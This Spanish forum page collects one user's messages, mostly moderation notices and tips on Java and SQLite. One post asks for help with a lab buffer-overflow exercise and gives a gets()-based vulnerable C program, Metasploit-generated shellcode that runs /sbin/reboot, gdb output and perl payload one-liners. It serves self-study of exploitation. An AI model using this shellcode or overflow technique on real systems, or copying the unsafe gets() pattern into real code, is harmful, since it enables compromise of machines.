Mensajes

El mensaje 'Ayuda con un ejercicio. Grabar datos en un fichero secuencial de texto.' fue bloqueado
Considero quela temática ha sido completamente explotada. Para evitar spam, flood y demás cierro el post. Si crees que debería dejarlo abierto, tan solo tienes que decirmelo Gracias por tu contribución!
Leer reglas:
http://foro.elhacker.net/reglas

Gracias por tu aporte
A pesar de que ese errorcillo ha sido un poquito fiu fiu ehh 
Si aceptas una sugerencia, el siguiente paso podría ser que buscase en varios servicios, además de probar con un diccionario especificado, o incluso generar combinaciones alfabéticas.

Saludos

[0xbffff490]

Buenas a todos, compañeros foreros, estoy trabajando este programa, al cual intento inyectar una shellcode:

Código (c) [Seleccionar] Expandir


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void premio() {
printf("El flujo de código ha sido modificado.\n");
}

int main(int argc, char **argv) {
char buffer[64];
gets(buffer);
}


Y genero shellcode con el siguiente comando:

Código [Seleccionar] Expandir


root@debci-lab:/usr/share/metasploit-framework/tools# msfpayload linux/x86/exec CMD="/sbin/reboot" P
# linux/x86/exec - 48 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependFork=false, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=false, CMD=/sbin/reboot
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0d\x00\x00" .
"\x00\x2f\x73\x62\x69\x6e\x2f\x72\x65\x62\x6f\x6f\x74\x00" .
"\x57\x53\x89\xe1\xcd\x80";


Y usando el pattern match de msf, me dice que la return address está en un offset de 76 a partir del buffer. Por tanto hago lo siguiente:

[28 NOPS] + [48 PAYLOAD] + [4 RTN ADDRESS]

Para calcular la RTN address, he hecho lo siguiente (la dirección de mi buffer):

Código [Seleccionar] Expandir


gdb poc
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/testOverflow/poc...done.
(gdb) break main
Breakpoint 1 at 0x8048469: file test.c, line 12.
(gdb) run
Starting program: /root/testOverflow/poc

Breakpoint 1, main (argc=1, argv=0xbffff584) at test.c:12
12 gets(buffer);
(gdb) print &buffer
1 = (char (*)[64]) 0xbffff490
(gdb) quit
A debugging session is active.

Inferior 1 [process 10092] will be killed.

Quit anyway? (y or n) y


Por tanto me queda así el buffer que mando, sabiendo que la address del buffer es 0xbffff490:

Código [Seleccionar] Expandir


perl -e 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0d\x00\x00\x00\x2f\x73\x62\x69\x6e\x2f\x72\x65\x62\x6f\x6f\x74\x00\x57\x53\x89\xe1\xcd\x80". "\x90"x28 . "\x90\xf4\xff\bf"'

Pero solamente obtengo un "Violación del segmento".

Para asegurarme que el buffer está bien calculado en tamaño, hago lo siguiente:

Código [Seleccionar] Expandir


perl -e 'print "\x90"x28 . "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x0d\x00\x00\x00\x2f\x73\x62\x69\x6e\x2f\x72\x65\x62\x6f\x6f\x74\x00\x57\x53\x89\xe1\xcd\x80" . "\x4c\x84\x04\x08"' | ./poc
El flujo de código ha sido modificado.
Violación de segmento


Sabiendo que la dirección de premio() es 0x0804844c, que he conseguido gracias a objdump.

Qué estoy haciendo mal? Abordando el problema usando la ADDR de premio(), llego a la conclusión de que la dirección de salto es incorrecta o que el payload está mal generado?

Estoy cómo loco y no sé que diablos me pasa...

El mensaje 'Problema con Java y Eclipse' fue bloqueado
Usa el buscador y la FAQ del foro!
Leer reglas:
http://foro.elhacker.net/reglas

El tema ha sido movido a Programación General.

http://foro.elhacker.net/index.php?topic=407586.0

Muchas gracias por el aporte.

Un saludo!

Genial! Además de útil instructivo.
Mis felicitaciones!

Un saludo

Tienes que hacerlo con un visor específico para SQLite. Yo te recomiendo este:
http://sqlitebrowser.sourceforge.net/

Un saludo

El mensaje 'Problema con JLabel con setBackground y setText' fue bloqueado
Thread resuelto.
Leer reglas:
http://foro.elhacker.net/reglas

Sin duda, la mejor solución para ti pasa por SQLite o bien Derby, que no requieren un servicio funcional, simplemente llevas contigo un archivo .db que contiene todas las tablas.
He aquí un ejemplo:

http://elblogdejnj.blogspot.com.es/2013/03/sqlite-con-java.html

Cómo ves, tan solo necesitas JDBC, para hacerlo funcionar.

Un saludo!